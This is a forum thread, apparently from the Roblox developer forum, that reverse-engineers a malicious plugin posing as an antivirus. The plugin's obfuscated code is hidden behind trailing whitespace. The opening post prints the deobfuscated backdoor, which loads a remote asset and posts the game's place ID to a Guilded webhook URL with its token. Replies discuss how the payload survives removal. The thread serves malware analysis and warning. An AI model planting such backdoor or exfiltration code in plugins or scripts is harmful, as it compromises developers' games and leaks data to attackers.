Reverse-engineering malicious plugins #1

Kealomon · February 24, 2024, 3:02am

ah yes, an ANTIVIRUSANTIVIRUSANTIVIRUS plugin.

lets get this in game shall we

seems legit, (btw completely rips off @Alligator_Lizard125 Anti-Virus Plugin)
but why is there 3821 spaces at the end of the script?

hmm, lets see where this goes to

code obfuscated with moonsec and vLua
since im too lazy to constant dump moonsec lets just edit the vLua code and see what it does

  21:53:35.881  
local exe = game:GetService("InsertService"):LoadAsset(1421511821)
local success,Error = pcall(function(...)
	local k = {
		['embeds'] = {{
		    ['title'] = "**Onyx SS**",
		    ['description'] = "https://www.roblox.com/games/"..game.PlaceId
		    }}
	}
	local v = http:JSONEncode(k)
    game:GetService("HttpService"):PostAsync("https://media.guilded.gg/webhooks/9a4e6092-4080-41e0-b651-b6125c6e9eb3/Uwtah8NquWqOCmUk4EimCKWMOmG8OWWco8a04oYmakeqmYmQUOOwckAWYoE0ii84eUG6O0YioaOeUw2yuoweAI", v)	
end)
  -  Edit

now let’s delete the webhook and see our free new server-side executor we got!!!

bruh this is trash

this reverse engineer was made by Kealomon Productions (more comin soon)

Doomcolp · February 24, 2024, 4:14am

I love how they added isVirus = false lol like that proves something

Doomcolp · February 27, 2024, 3:49am

Also love how they casually add comments telling the reader about what each section of the plugin opening code is for.

It’s just so insane that they can just do virus:remove().

toomanynighhts · February 27, 2024, 4:03am

I think they copied from a template or passed it thru ChatGPT, I don’t even know

xChris_vC · February 27, 2024, 7:57am

lol the fact that they didn’t even wrap the vLua module in the main script itself says something about their level

RobIoxArenaEvents · February 27, 2024, 10:36pm

Pretty interesting overall, but how exactly were you able to print original source code by changing a single line of code in this vLua module to print something?

AdvancedOpenGL · February 27, 2024, 11:19pm

:remove() is the old version of :Delete()
it only exists in lowercase form so the uppercase :Delete() is bizarre

RaterixRGL · February 28, 2024, 3:54am

This is wrong, remove works both lowercase and capital. Remove is not the old version of Delete, delete literally doesn’t exist. Do you mean "Destroy”? Remove and Destroy are completely separate. Remove just sets the object parent to nil, while Destroy does much more and was intended to replace Remove entirely, completely deprecating the old functionality.

This in particular calls “Remove” because it actually allows the virus to continue executing.

BrAlMeSo_Mc · February 28, 2024, 11:17am

I honestly, don’t think it’s called :Delete(), it’s :Destroy(). Thanks.

KadenBloxYT · February 28, 2024, 4:55pm

So what does DebrisService do? Doesn’t it do the same?

RaterixRGL · February 28, 2024, 10:23pm

DebrisService calls destroy after a period of time.

Debris:AddItem(Instance,10) will destroy it in 10 seconds. However, if there is an overflow and the maximum entries has been hit, it will start destroying immediately until the que is below the maximum again. The maximum entries is dynamically set and within the hundreds of thousands.

MaybeHoshi · March 1, 2024, 5:56am

That’s pretty interesting.
Quite intriguing to see how those backdoors worked.

i’m wondering if you’re able to edit what the guilded notification says :3